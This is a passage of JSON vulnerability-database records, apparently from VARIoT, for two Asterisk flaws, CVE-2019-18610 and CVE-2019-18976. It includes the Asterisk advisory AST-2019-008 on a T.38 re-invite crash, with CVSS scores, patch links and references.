        "id": "CNVD-2020-03060"
      }
    ],
    "trust": 0.948297215
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:07.630000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Security Advisories",
        "trust": 0.8,
        "url": "https://www.asterisk.org/downloads/security-advisories"
      },
      {
        "title": "AST-2019-007",
        "trust": 0.8,
        "url": "http://downloads.asterisk.org/pub/security/AST-2019-007.html"
      },
      {
        "title": "[SECURITY] [DLA 2017-1] asterisk security update",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
      },
      {
        "title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Command Execution Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/196957"
      },
      {
        "title": "Sangoma Technologies Asterisk  and Sangoma Technologies Certified Asterisk Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=104055"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-862",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18610"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
      },
      {
        "trust": 1.6,
        "url": "https://www.asterisk.org/downloads/security-advisories"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18610"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18610"
      },
      {
        "trust": 0.6,
        "url": "https://seclists.org/fulldisclosure/2019/nov/19"
      },
      {
        "trust": 0.6,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
      },
      {
        "trust": 0.6,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
      },
      {
        "trust": 0.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html   second message url unavailable at time of publishing"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/asterisk-privilege-escalation-via-ami-originate-request-30936"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155435/asterisk-project-security-advisory-ast-2019-007.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2019-007.pdf"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/ast-2019-007.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.asterisk.org/security"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.diff"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-007-17.diff"
      },
      {
        "trust": 0.1,
        "url": "https://issues.asterisk.org/jira/browse/asterisk-28580"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-007-16.diff"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.21.diff"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "db": "PACKETSTORM",
        "id": "155435"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18610"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "db": "PACKETSTORM",
        "id": "155435"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18610"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-01-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "date": "2019-12-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "date": "2019-11-21T23:30:33",
        "db": "PACKETSTORM",
        "id": "155435"
      },
      {
        "date": "2019-11-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      },
      {
        "date": "2019-11-22T18:15:11.030000",
        "db": "NVD",
        "id": "CVE-2019-18610"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-01-21T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-03060"
      },
      {
        "date": "2019-12-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      },
      {
        "date": "2022-04-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      },
      {
        "date": "2024-11-21T04:33:21.593000",
        "db": "NVD",
        "id": "CVE-2019-18610"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155435"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sangoma Asterisk and  Certified Asterisk Vulnerabilities related to lack of authentication",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012584"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1290"
      }
    ],
    "trust": 0.6
  }
}

var-201911-1367

Vulnerability from variot

An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code. Asterisk Project Security Advisory -

     Product        Asterisk                                              
     Summary        Re-invite with T.38 and malformed SDP causes crash.   
Nature of Advisory  Remote Crash                                          
  Susceptibility    Remote Authenticated Sessions                         
     Severity       Minor                                                 
  Exploits Known    No                                                    
   Reported On      November 07, 2019                                     
   Reported By      Salah Ahmed                                           
    Posted On       November 21, 2019                                     
 Last Updated On    November 21, 2019                                     
 Advisory Contact   bford AT sangoma DOT com                              
     CVE Name       CVE-2019-18976

  Description     If Asterisk receives a re-invite initiating T.38        
                  faxing and has a port of 0 and no c line in the SDP, a  
                  crash will occur.                                       
Modules Affected  res_pjsip_t38.c

Resolution  If T.38 faxing is not needed, then the “t38_udptl”            
            configuration option in pjsip.conf can be set to “no” to      
            disable the functionality. This option automatically          
            defaults to “no” and would have to be manually turned on to   
            experience this crash.

            If T.38 faxing is needed, then Asterisk should be upgraded    
            to a fixed version.

                           Affected Versions       
                     Product                       Release  
                                                   Series   
              Asterisk Open Source                  13.x    All versions  
               Certified Asterisk                   13.21   All versions

                              Corrected In                   
                          Product                              Release    
                   Asterisk Open Source                        13.29.2    
                    Certified Asterisk                       13.21-cert5

                                 Patches                         
                           SVN URL                                Revision

http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff Asterisk 13 http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified
Asterisk
13.21-cert5

Links  https://issues.asterisk.org/jira/browse/ASTERISK-28612

Asterisk Project Security Advisories are posted at                        
http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest      
version will be posted at http://downloads.digium.com/pub/security/.pdf   
and http://downloads.digium.com/pub/security/.html

                            Revision History
      Date          Editor                 Revisions Made                 
November 12, 2019  Ben Ford  Initial Revision                             
November 21, 2019  Ben Ford  Added “Posted On” date

                  Asterisk Project Security Advisory -
           Copyright © 2019 Digium, Inc. All Rights Reserved.

Permission is hereby granted to distribute and publish this advisory in its original, unaltered form

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1367",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.21"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.29.1"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "digium",
        "version": "13.x"
      },
      {
        "model": "certified asterisk",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "digium",
        "version": "13.21-x"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "\u003c=13.*"
      },
      {
        "model": "certified asterisk",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "\u003c=13.21-*"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18976"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:digium:asterisk",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:digium:certified_asterisk",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "bford",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-18976",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2019-18976",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-01312",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-18976",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-18976",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-18976",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-18976",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-01312",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1292",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18976"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code.                       Asterisk Project Security Advisory -\n\n         Product        Asterisk                                              \n         Summary        Re-invite with T.38 and malformed SDP causes crash.   \n    Nature of Advisory  Remote Crash                                          \n      Susceptibility    Remote Authenticated Sessions                         \n         Severity       Minor                                                 \n      Exploits Known    No                                                    \n       Reported On      November 07, 2019                                     \n       Reported By      Salah Ahmed                                           \n        Posted On       November 21, 2019                                     \n     Last Updated On    November 21, 2019                                     \n     Advisory Contact   bford AT sangoma DOT com                              \n         CVE Name       CVE-2019-18976                                        \n\n      Description     If Asterisk receives a re-invite initiating T.38        \n                      faxing and has a port of 0 and no c line in the SDP, a  \n                      crash will occur.                                       \n    Modules Affected  res_pjsip_t38.c                                         \n\n    Resolution  If T.38 faxing is not needed, then the \u201ct38_udptl\u201d            \n                configuration option in pjsip.conf can be set to \u201cno\u201d to      \n                disable the functionality. This option automatically          \n                defaults to \u201cno\u201d and would have to be manually turned on to   \n                experience this crash.                                        \n                                                                              \n                If T.38 faxing is needed, then Asterisk should be upgraded    \n                to a fixed version.                                           \n\n                               Affected Versions       \n                         Product                       Release  \n                                                       Series   \n                  Asterisk Open Source                  13.x    All versions  \n                   Certified Asterisk                   13.21   All versions  \n\n                                  Corrected In                   \n                              Product                              Release    \n                       Asterisk Open Source                        13.29.2    \n                        Certified Asterisk                       13.21-cert5  \n\n                                     Patches                         \n                               SVN URL                                Revision   \n  http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff    Asterisk 13 \n  http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified   \n                                                                     Asterisk    \n                                                                     13.21-cert5 \n\n    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28612             \n\n    Asterisk Project Security Advisories are posted at                        \n    http://www.asterisk.org/security                                          \n                                                                              \n    This document may be superseded by later versions; if so, the latest      \n    version will be posted at http://downloads.digium.com/pub/security/.pdf   \n    and http://downloads.digium.com/pub/security/.html                        \n\n                                Revision History\n          Date          Editor                 Revisions Made                 \n    November 12, 2019  Ben Ford  Initial Revision                             \n    November 21, 2019  Ben Ford  Added \u201cPosted On\u201d date                       \n\n                      Asterisk Project Security Advisory -\n               Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n  Permission is hereby granted to distribute and publish this advisory in its\n                           original, unaltered form",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-18976"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "db": "PACKETSTORM",
        "id": "155436"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-18976",
        "trust": 3.1
      },
      {
        "db": "PACKETSTORM",
        "id": "155436",
        "trust": 1.7
      },
      {
        "db": "CS-HELP",
        "id": "SB2019112218",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4421",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "db": "PACKETSTORM",
        "id": "155436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18976"
      }
    ]
  },
  "id": "VAR-201911-1367",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      }
    ],
    "trust": 0.948297215
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:07.503000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "AST-2019-008",
        "trust": 0.8,
        "url": "http://downloads.asterisk.org/pub/security/AST-2019-008.html"
      },
      {
        "title": "Security Advisories",
        "trust": 0.8,
        "url": "https://www.asterisk.org/downloads/security-advisories"
      },
      {
        "title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Code Issue Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/196675"
      },
      {
        "title": "Sangoma Technologies Asterisk  and Sangoma Technologies Certified Asterisk Fixes for code issue vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=104688"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-476",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18976"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "https://seclists.org/fulldisclosure/2019/nov/20"
      },
      {
        "trust": 2.2,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
      },
      {
        "trust": 2.2,
        "url": "https://packetstormsecurity.com/files/155436/asterisk-project-security-advisory-ast-2019-008.html"
      },
      {
        "trust": 1.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2019112218?affchecked=1"
      },
      {
        "trust": 1.6,
        "url": "https://www.asterisk.org/downloads/security-advisories"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18976"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18976"
      },
      {
        "trust": 0.6,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
      },
      {
        "trust": 0.6,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/asterisk-denial-of-service-via-t-38-sdp-re-invite-30937"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.diff"
      },
      {
        "trust": 0.1,
        "url": "https://issues.asterisk.org/jira/browse/asterisk-28612"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/.pdf"
      },
      {
        "trust": 0.1,
        "url": "http://www.asterisk.org/security"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.digium.com/pub/security/.html"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.21.diff"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "db": "PACKETSTORM",
        "id": "155436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18976"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "db": "PACKETSTORM",
        "id": "155436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18976"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-01-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "date": "2019-12-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "date": "2019-11-21T23:55:55",
        "db": "PACKETSTORM",
        "id": "155436"
      },
      {
        "date": "2019-11-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      },
      {
        "date": "2019-11-22T17:15:11.833000",
        "db": "NVD",
        "id": "CVE-2019-18976"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-01-10T00:00:00",
